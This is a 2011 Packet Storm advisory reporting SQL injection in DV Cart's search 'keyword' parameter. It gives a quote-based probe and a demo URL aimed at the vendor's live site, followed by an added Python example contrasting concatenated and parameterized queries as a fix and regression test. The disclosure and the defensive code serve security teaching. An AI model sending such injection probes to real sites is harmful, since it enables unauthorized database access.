DV Cart SQL Injection

2011-08-20T00:00:00
ID PACKETSTORM:104281
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-20T00:00:00

Description

                                        
`# Exploit Title: DV Cart (E-Commerce System) SQL Injection  
# Date: 19.08.2011  
# Author: Eyup CELIK  
# Software Link: http://www.esmistudio.com  
# Version: All versions  
# Tested on: All versions are vulnerable  
  
ISSUE  
  
SQL injection is possible through the keyword parameter of the search request (mod=search)  
  
Example  
index.php?keyword=<SQL Injection Code>&mod=search&submit=GO  
  
Exploit:  
index.php?keyword='1&mod=search&submit=GO  
  
Demo:  
http://www.esmistudio.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO  
  
  
Thanks,  
  
  
Eyup CELIK  
Information Technologies Security Specialist  
http://www.eyupcelik.com.tr  
`
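
A single quote in keyword breaks the request when the search handler pastes the value into the SQL text. The block below is an added example, not DV Cart's code or the advisory author's: a Python/sqlite3 stand-in (DV Cart itself is a PHP application) with a hypothetical products table and function names. It shows a concatenated query failing on the advisory's `'1` input while a bound-parameter query treats it as data.

```python
import sqlite3

# Constructed stand-in for the shop's product table; the real DV Cart schema
# is not shown in the advisory, so table and column names are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products (name) VALUES (?)",
                   [("O'Neill jacket",), ("100% cotton shirt",), ("1 litre flask",)])
    return db

def search_concatenated(db, keyword):
    """Pattern that produces the reported behaviour: input pasted into SQL text."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + keyword + "%'"
    return [r[0] for r in db.execute(sql)]

def search_parameterized(db, keyword):
    """Hardened form: the keyword is bound as data and LIKE wildcards are escaped."""
    escaped = (keyword.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    sql = "SELECT name FROM products WHERE name LIKE ? ESCAPE '\\' ORDER BY id"
    return [r[0] for r in db.execute(sql, ("%" + escaped + "%",))]

def probe(db, keyword):
    """Run both handlers on one keyword and report what each does."""
    try:
        unsafe = search_concatenated(db, keyword)
    except sqlite3.Error as exc:
        # The quote ended the string literal early, so the statement no longer parses.
        unsafe = "SQL error: " + type(exc).__name__
    return unsafe, search_parameterized(db, keyword)

if __name__ == "__main__":
    db = make_db()
    # "'1" is the keyword value from the advisory; the others are constructed.
    for kw in ["'1", "O'Neill", "100%", "flask"]:
        print(repr(kw), probe(db, kw))
```

A database error surfacing on a legitimate search such as O'Neill is the same defect seen from the user's side, which makes it a useful regression test after the query is converted to bound parameters.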